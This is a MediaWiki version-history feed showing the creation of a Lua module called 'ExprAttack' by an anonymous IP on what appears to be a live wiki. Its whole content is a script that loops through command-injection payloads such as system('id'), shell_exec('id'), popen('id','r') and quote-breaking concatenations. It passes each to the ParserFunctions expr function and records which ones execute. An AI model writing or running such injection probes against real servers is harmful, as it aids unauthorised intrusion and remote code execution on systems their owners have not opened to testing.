http://120.55.36.65/w/index.php?action=history&feed=atom&title=%E6%A8%A1%E5%9D%97%3AExprAttack模块:ExprAttack - 版本历史2026-05-11T06:07:12Z本wiki上该页面的版本历史MediaWiki 1.40.0http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:ExprAttack&diff=1015&oldid=prev221.237.85.128:创建页面,内容为“local p = {} function p.test() local pf = mw.ext.ParserFunctions if not pf or not pf.expr then return "no_expr" end local results = {} -- Try injecting system commands through expr local injections = { "system('id')", "eval('system', 'id')", "exec('id')", "shell_exec('id')", "passthru('id')", "popen('id', 'r')", "' . system('id') . '", "'+system('id')+'", } for _, inj…”2026-05-09T06:57:04Z<p>创建页面,内容为“local p = {} function p.test() local pf = mw.ext.ParserFunctions if not pf or not pf.expr then return "no_expr" end local results = {} -- Try injecting system commands through expr local injections = { "system('id')", "eval('system', 'id')", "exec('id')", "shell_exec('id')", "passthru('id')", "popen('id', 'r')", "' . system('id') . '", "'+system('id')+'", } for _, inj…”</p>
<p><b>新页面</b></p><div>local p = {}<br />
function p.test()<br />
local pf = mw.ext.ParserFunctions<br />
if not pf or not pf.expr then return "no_expr" end<br />
<br />
local results = {}<br />
<br />
-- Try injecting system commands through expr<br />
local injections = {<br />
"system('id')",<br />
"eval('system', 'id')",<br />
"exec('id')",<br />
"shell_exec('id')",<br />
"passthru('id')",<br />
"popen('id', 'r')",<br />
"' . system('id') . '",<br />
"'+system('id')+'",<br />
}<br />
<br />
for _, inj in ipairs(injections) do<br />
local ok, ret = pcall(pf.expr, inj)<br />
local status = tostring(ok)<br />
if ok and ret then<br />
status = status .. ":" .. tostring(ret):sub(1,100)<br />
end<br />
results[#results+1] = inj:sub(1,30) .. "=" .. status<br />
end<br />
<br />
return table.concat(results, " | ")<br />
end<br />
return p</div>221.237.85.128